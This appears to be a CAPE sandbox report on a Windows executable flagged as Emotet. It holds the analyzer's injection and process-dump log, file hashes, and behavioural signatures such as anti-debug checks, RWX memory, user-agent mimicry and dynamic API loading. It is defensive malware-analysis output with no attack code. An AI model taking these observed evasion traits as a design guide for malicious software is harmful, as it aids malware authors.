2019-10-10 01:57:29,423 [root] DEBUG: DLL loaded at 0x742F0000: C:\Windows\SysWOW64\RASAPI32 (0x52000 bytes).
2019-10-10 01:57:29,423 [root] DEBUG: DLL loaded at 0x742D0000: C:\Windows\SysWOW64\rasman (0x15000 bytes).
2019-10-10 01:57:29,423 [root] DEBUG: DLL unloaded from 0x742F0000.
2019-10-10 01:57:29,423 [root] DEBUG: DLL loaded at 0x742C0000: C:\Windows\SysWOW64\rtutils (0xd000 bytes).
2019-10-10 01:57:29,437 [root] DEBUG: DLL loaded at 0x742B0000: C:\Windows\SysWOW64\sensapi (0x6000 bytes).
2019-10-10 01:57:29,437 [root] DEBUG: DLL unloaded from 0x75600000.
2019-10-10 01:57:29,437 [root] DEBUG: DLL unloaded from 0x742D0000.
2019-10-10 01:57:29,453 [root] DEBUG: DLL loaded at 0x74BD0000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-10-10 01:57:29,470 [root] DEBUG: DLL loaded at 0x74BC0000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-10-10 01:57:29,470 [root] DEBUG: DLL loaded at 0x74BA0000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-10-10 01:57:29,470 [root] DEBUG: DLL loaded at 0x74BF0000: C:\Windows\System32\mswsock (0x3c000 bytes).
2019-10-10 01:57:29,470 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-10-10 01:57:29,484 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-10-10 01:57:29,484 [root] DEBUG: DLL loaded at 0x742A0000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-10-10 01:57:29,484 [root] DEBUG: DLL loaded at 0x741B0000: C:\Windows\SysWOW64\rasadhlp (0x6000 bytes).
2019-10-10 01:57:29,500 [root] DEBUG: DLL loaded at 0x74170000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-10-10 01:57:29,516 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-10-10 01:57:29,548 [root] DEBUG: DLL loaded at 0x74110000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-10-10 01:57:29,548 [root] DEBUG: DLL loaded at 0x74100000: C:\Windows\SysWOW64\RpcRtRemote (0xe000 bytes).
2019-10-10 01:57:29,562 [root] DEBUG: DLL loaded at 0x740E0000: C:\Windows\SysWOW64\DHCPCSVC (0x12000 bytes).
2019-10-10 01:57:29,562 [root] DEBUG: DLL loaded at 0x740D0000: C:\Windows\SysWOW64\dhcpcsvc6 (0xd000 bytes).
2019-10-10 01:57:29,562 [root] DEBUG: DLL unloaded from 0x74360000.
2019-10-10 01:57:29,562 [root] DEBUG: DLL unloaded from 0x740E0000.
2019-10-10 01:57:31,950 [root] DEBUG: DLL unloaded from 0x75600000.
2019-10-10 01:57:42,371 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-10-10 01:57:42,371 [root] DEBUG: DLL unloaded from 0x74110000.
2019-10-10 01:57:42,401 [root] DEBUG: DLL unloaded from 0x75600000.
2019-10-10 01:57:58,079 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 01:59:22,913 [root] DEBUG: DLL unloaded from 0x000007FEFD430000.
2019-10-10 01:59:22,944 [root] INFO: Announced starting service "WerSvc"
2019-10-10 01:59:22,944 [root] INFO: Announced 64-bit process name: svchost.exe pid: 884
2019-10-10 01:59:22,960 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:59:22,960 [lib.api.process] INFO: 64-bit DLL to inject is C:\epyfuwi\dll\DQkWzH.dll, loader C:\epyfuwi\bin\nUWuvqFN.exe
2019-10-10 01:59:22,960 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:59:22,960 [root] DEBUG: Loader: Injecting process 884 (thread 1308) with C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:22,960 [root] DEBUG: Process image base: 0x00000000FFA10000
2019-10-10 01:59:22,960 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:22,960 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FFA1B000 - 0x000007FEFF430000
2019-10-10 01:59:22,974 [root] DEBUG: InjectDllViaIAT: Allocated 0x20c bytes for new import table at 0x00000000FFA20000.
2019-10-10 01:59:22,974 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:59:22,974 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:22,974 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 884
2019-10-10 01:59:22,974 [root] INFO: Announced 64-bit process name: svchost.exe pid: 884
2019-10-10 01:59:22,974 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:59:22,974 [lib.api.process] INFO: 64-bit DLL to inject is C:\epyfuwi\dll\DQkWzH.dll, loader C:\epyfuwi\bin\nUWuvqFN.exe
2019-10-10 01:59:22,990 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:59:22,990 [root] DEBUG: Loader: Injecting process 884 (thread 1308) with C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:22,990 [root] DEBUG: Process image base: 0x00000000FFA10000
2019-10-10 01:59:22,990 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:22,990 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:59:22,990 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:22,990 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 884
2019-10-10 01:59:23,006 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:59:23,006 [root] DEBUG: Process dumps enabled.
2019-10-10 01:59:23,006 [root] INFO: Disabling sleep skipping.
2019-10-10 01:59:23,006 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:59:23,006 [root] WARNING: Unable to hook LockResource
2019-10-10 01:59:23,022 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:59:23,022 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 884 at 0x00000000741C0000, image base 0x00000000FFA10000, stack from 0x0000000000275000-0x0000000000280000
2019-10-10 01:59:23,022 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k WerSvcGroup.
2019-10-10 01:59:23,022 [root] INFO: Added new process to list with pid: 884
2019-10-10 01:59:23,022 [root] INFO: Monitor successfully loaded in process with pid 884.
2019-10-10 01:59:23,052 [root] DEBUG: DLL loaded at 0x000007FEF9C40000: c:\windows\system32\wersvc (0x18000 bytes).
2019-10-10 01:59:23,052 [root] DEBUG: DLL unloaded from 0x000007FEF9C40000.
2019-10-10 01:59:23,085 [root] DEBUG: DLL loaded at 0x000007FEF7420000: C:\Windows\System32\faultrep (0x5c000 bytes).
2019-10-10 01:59:23,099 [root] DEBUG: DLL loaded at 0x000007FEF8CA0000: C:\Windows\System32\wer (0x7c000 bytes).
2019-10-10 01:59:23,131 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\SHELL32 (0xd88000 bytes).
2019-10-10 01:59:23,131 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\System32\profapi (0xf000 bytes).
2019-10-10 01:59:23,131 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\System32\USERENV (0x1e000 bytes).
2019-10-10 01:59:23,163 [root] INFO: Announced 64-bit process name: WerFault.exe pid: 2680
2019-10-10 01:59:23,163 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:59:23,163 [lib.api.process] INFO: 64-bit DLL to inject is C:\epyfuwi\dll\DQkWzH.dll, loader C:\epyfuwi\bin\nUWuvqFN.exe
2019-10-10 01:59:23,163 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:59:23,163 [root] DEBUG: Loader: Injecting process 2680 (thread 2636) with C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:23,163 [root] DEBUG: Process image base: 0x00000000FF530000
2019-10-10 01:59:23,163 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:23,177 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF599000 - 0x000007FEFF430000
2019-10-10 01:59:23,177 [root] DEBUG: InjectDllViaIAT: Allocated 0x25c bytes for new import table at 0x00000000FF5A0000.
2019-10-10 01:59:23,177 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:59:23,177 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:23,177 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2680
2019-10-10 01:59:23,177 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-10-10 01:59:23,177 [root] INFO: Announced 64-bit process name: WerFault.exe pid: 2680
2019-10-10 01:59:23,177 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:59:23,177 [lib.api.process] INFO: 64-bit DLL to inject is C:\epyfuwi\dll\DQkWzH.dll, loader C:\epyfuwi\bin\nUWuvqFN.exe
2019-10-10 01:59:23,194 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:59:23,194 [root] DEBUG: Loader: Injecting process 2680 (thread 2636) with C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:23,194 [root] DEBUG: Process image base: 0x00000000FF530000
2019-10-10 01:59:23,194 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:23,194 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:59:23,194 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:23,194 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2680
2019-10-10 01:59:23,194 [root] DEBUG: DLL unloaded from 0x000007FEF7420000.
2019-10-10 01:59:23,224 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:59:23,224 [root] DEBUG: Process dumps enabled.
2019-10-10 01:59:23,224 [root] INFO: Disabling sleep skipping.
2019-10-10 01:59:23,224 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:59:23,224 [root] WARNING: Unable to hook LockResource
2019-10-10 01:59:23,224 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:59:23,224 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2680 at 0x00000000741C0000, image base 0x00000000FF530000, stack from 0x00000000001E5000-0x00000000001F0000
2019-10-10 01:59:23,240 [root] DEBUG: Commandline: C:\Windows\sysnative\WerFault.exe -u -p 1632 -s 2896.
2019-10-10 01:59:23,240 [root] INFO: Added new process to list with pid: 2680
2019-10-10 01:59:23,240 [root] INFO: Monitor successfully loaded in process with pid 2680.
2019-10-10 01:59:23,286 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\VERSION (0xc000 bytes).
2019-10-10 01:59:23,302 [root] DEBUG: DLL unloaded from 0x00000000772D0000.
2019-10-10 01:59:23,319 [root] DEBUG: DLL unloaded from 0x000007FEF7420000.
2019-10-10 01:59:24,082 [root] DEBUG: DLL loaded at 0x000007FEF2D10000: C:\Windows\system32\dbgeng (0x374000 bytes).
2019-10-10 01:59:24,082 [root] DEBUG: DLL loaded at 0x000007FEF4360000: C:\Windows\system32\dbghelp (0x125000 bytes).
2019-10-10 01:59:24,161 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-10-10 01:59:25,361 [root] DEBUG: DLL unloaded from 0x000007FEF4360000.
2019-10-10 01:59:25,378 [root] DEBUG: DLL loaded at 0x000007FEFBA20000: C:\Windows\system32\SensApi (0x9000 bytes).
2019-10-10 01:59:26,127 [root] DEBUG: DLL loaded at 0x000007FEF9900000: C:\Windows\system32\werui (0x2d000 bytes).
2019-10-10 01:59:26,127 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-10-10 01:59:26,141 [root] DEBUG: DLL loaded at 0x000007FEFB320000: C:\Windows\system32\DUI70 (0xf2000 bytes).
2019-10-10 01:59:26,141 [root] DEBUG: DLL loaded at 0x000007FEFB060000: C:\Windows\system32\DUser (0x43000 bytes).
2019-10-10 01:59:26,157 [root] DEBUG: DLL loaded at 0x000007FEF5030000: C:\Windows\system32\RICHED20 (0x9e000 bytes).
2019-10-10 01:59:27,000 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\SHELL32 (0xd88000 bytes).
2019-10-10 01:59:27,062 [root] DEBUG: DLL loaded at 0x000007FEFB7C0000: C:\Windows\system32\UxTheme (0x56000 bytes).
2019-10-10 01:59:27,062 [root] DEBUG: DLL unloaded from 0x000007FEFBB00000.
2019-10-10 01:59:27,062 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 01:59:27,062 [root] DEBUG: DLL unloaded from 0x0000000076EF0000.
2019-10-10 01:59:27,062 [root] DEBUG: DLL unloaded from 0x000007FEFB060000.
2019-10-10 01:59:27,078 [root] DEBUG: DLL unloaded from 0x000007FEFBB00000.
2019-10-10 01:59:27,078 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 01:59:27,078 [root] DEBUG: DLL unloaded from 0x0000000076EF0000.
2019-10-10 01:59:27,078 [root] DEBUG: DLL unloaded from 0x000007FEFB060000.
2019-10-10 01:59:27,078 [root] DEBUG: DLL unloaded from 0x000007FEFBB00000.
2019-10-10 01:59:27,078 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:00:43,767 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-10-10 02:00:43,767 [root] INFO: Created shutdown mutex.
2019-10-10 02:00:44,782 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 1632
2019-10-10 02:00:44,782 [root] INFO: Terminate event set for process 1632.
2019-10-10 02:00:44,782 [root] INFO: Terminating process 1632 before shutdown.
2019-10-10 02:00:44,782 [root] INFO: Waiting for process 1632 to exit.
2019-10-10 02:00:45,796 [root] INFO: Waiting for process 1632 to exit.
2019-10-10 02:00:46,809 [root] INFO: Waiting for process 1632 to exit.
2019-10-10 02:00:47,823 [root] INFO: Waiting for process 1632 to exit.
2019-10-10 02:00:48,838 [lib.api.process] INFO: Successfully terminated process with pid 1632.
2019-10-10 02:00:48,854 [root] INFO: Waiting for process 1632 to exit.
2019-10-10 02:00:49,868 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 2732
2019-10-10 02:00:49,868 [root] DEBUG: Terminate Event: Attempting to dump process 2732
2019-10-10 02:00:49,868 [root] INFO: Terminate event set for process 2732.
2019-10-10 02:00:49,868 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-10-10 02:00:49,868 [root] INFO: Terminating process 2732 before shutdown.
2019-10-10 02:00:49,868 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 02:00:49,868 [root] INFO: Waiting for process 2732 to exit.
2019-10-10 02:00:49,868 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-10-10 02:00:49,868 [root] DEBUG: DumpProcess: Module entry point VA is 0x00007DD3.
2019-10-10 02:00:49,882 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\2732_4495177164901104102019
2019-10-10 02:00:49,882 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xa600.
2019-10-10 02:00:49,882 [root] DEBUG: Terminate Event: Skipping dump of process 2732
2019-10-10 02:00:49,882 [root] DEBUG: Terminate Event: Shutdown complete for process 2732 but failed to inform analyzer.
2019-10-10 02:00:50,881 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 884
2019-10-10 02:00:50,881 [root] DEBUG: Terminate Event: Attempting to dump process 884
2019-10-10 02:00:50,881 [root] INFO: Terminate event set for process 884.
2019-10-10 02:00:50,881 [root] INFO: Terminating process 884 before shutdown.
2019-10-10 02:00:50,881 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00000000FFA10000.
2019-10-10 02:00:50,881 [root] INFO: Waiting for process 884 to exit.
2019-10-10 02:00:50,881 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 02:00:50,881 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FFA10000.
2019-10-10 02:00:50,881 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000246C.
2019-10-10 02:00:50,897 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\System32\cryptbase (0xf000 bytes).
2019-10-10 02:00:50,897 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\884_5526042975001104102019
2019-10-10 02:00:50,897 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x6600.
2019-10-10 02:00:50,897 [root] DEBUG: Terminate Event: Skipping dump of process 884
2019-10-10 02:00:50,913 [root] DEBUG: Terminate Event: Shutdown complete for process 884 but failed to inform analyzer.
2019-10-10 02:00:51,895 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 2680
2019-10-10 02:00:51,895 [root] DEBUG: Terminate Event: Attempting to dump process 2680
2019-10-10 02:00:51,895 [root] INFO: Terminate event set for process 2680.
2019-10-10 02:00:51,895 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00000000FF530000.
2019-10-10 02:00:51,895 [root] INFO: Terminating process 2680 before shutdown.
2019-10-10 02:00:51,895 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 02:00:51,895 [root] INFO: Waiting for process 2680 to exit.
2019-10-10 02:00:51,895 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FF530000.
2019-10-10 02:00:51,895 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000044920.
2019-10-10 02:00:51,927 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\2680_14517731695101104102019
2019-10-10 02:00:51,927 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x65600.
2019-10-10 02:00:51,941 [root] DEBUG: Terminate Event: Skipping dump of process 2680
2019-10-10 02:00:51,941 [root] DEBUG: Terminate Event: Shutdown complete for process 2680 but failed to inform analyzer.
2019-10-10 02:00:52,910 [root] INFO: Shutting down package.
2019-10-10 02:00:52,910 [root] INFO: Stopping auxiliary modules.
2019-10-10 02:00:52,910 [root] INFO: Finishing auxiliary modules.
2019-10-10 02:00:52,910 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-10-10 02:00:52,910 [root] WARNING: File at path "C:\eFiNvgcB\debugger" does not exist, skip.
2019-10-10 02:00:52,910 [root] INFO: Analysis completed.

MalScore

10.0

Emotet

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2019-10-10 00:57:00 2019-10-10 01:01:07

File Details

File Name ygg9ytft62s5ip.exe
File Size 624643 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0efd85b3915d9618f91979e65e520478
SHA1 e70ff18b0f850df07c81c168437f78d51c679625
SHA256 a1d4243b1e2380d5fc9d26ea036bd00c39f09cdcdfc1a3d2b699b5fc15cf29a0
SHA512 41601f2bafff43599da6e50b07952f743669e7cafabebcc1b1caf441c89425814c22b5094fe1bc72bc414c0c3f1024fbfaa54688cfc0c39c1f016a71d609ac42
CRC32 E6EF58FC
Ssdeep 6144:89b9SO5dVdRQ/vqkg1gEagdQHiQSzPgAJ76KkWv:8fBV7uikFgCShJkQ
TrID
  • 41.0% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
  • 36.3% (.EXE) Win64 Executable (generic) (27625/18/4)
  • 8.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 5.9% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 2.6% (.EXE) OS/2 Executable (generic) (2029/13)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Resubmit sample

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Behavioural detection: Executable code extraction
At least one process apparently crashed during execution
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 1988 trigged the Yara rule 'Emotet'
Hit: PID 1356 trigged the Yara rule 'Emotet'
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: ygg9ytft62s5ip.exe, PID 1988
Mimics the system's user agent string for its own requests
Dynamic (imported) function loading detected
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: KERNELBASE.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: propsys.dll/PSLookupPropertyHandlerCLSID
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: propsys.dll/PSCreatePropertyStoreFromObject
DynamicLoader: propsys.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/PropVariantToBuffer
DynamicLoader: propsys.dll/PropVariantToUInt64
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: propsys.dll/InitPropVariantFromBuffer
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/TreeSetNamedSecurityInfoW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: KERNELBASE.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: KERNELBASE.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptDuplicateHash
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
